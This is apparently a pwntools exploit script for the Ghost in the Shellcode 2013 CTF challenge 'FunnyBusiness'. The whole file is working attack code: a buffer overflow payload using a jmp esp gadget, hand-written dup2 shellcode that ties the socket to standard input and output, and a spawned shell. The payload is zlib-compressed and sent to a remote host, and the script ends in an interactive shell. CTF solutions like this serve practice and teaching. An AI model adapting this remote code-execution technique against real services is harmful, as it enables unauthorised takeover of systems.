exploit.py

#!/usr/bin/env python2

# Ghost in the Shellcode 2013 : FunnyBusiness
# http://shell-storm.org/repo/CTF/GITS-2013/Pwnable/FunnyBusiness-100/

from pwn import *
import zlib

addr_jmp_esp = 0x08049043 # 0x08049043: jmp esp ;  (1 found)

zlib_header_length = 7
offset_return_addr = 13

socket_fd = 4

context(os='linux', arch='i386')

r = remote('169.254.226.239', 49681)

payload = ''
payload += 'A' * (offset_return_addr - zlib_header_length)
payload += p32(addr_jmp_esp)

# dup2(fd,0); dup2(fd,1); dup2(fd,2);
payload += '\x31\xc9'                     # xor    %ecx,%ecx
payload += '\x8d\x59' + chr(socket_fd)    # lea ebx, [ecx + socket_fd]
# loop:
payload += '\x6a\x3f'                     # push   $0x3f
payload += '\x58'                         # pop    %eax
payload += '\xcd\x80'                     # int    $0x80
payload += '\x41'                         # inc    %ecx
payload += '\x80\xf9\x03'                 # cmp    $0x3,%cl
payload += '\x75\xf5'                     # jne    80483e8 <loop>

payload += asm(shellcraft.sh())

log.info('payload:\n%s' % hexdump(payload))

zlibed_payload = zlib.compress(payload, 0)
log.info('zlibed_payload:\n%s' % hexdump(zlibed_payload))

log.info('send payload length')
r.send(p32(len(zlibed_payload)))

log.info('send payload')
r.send(zlibed_payload)

r.interactive()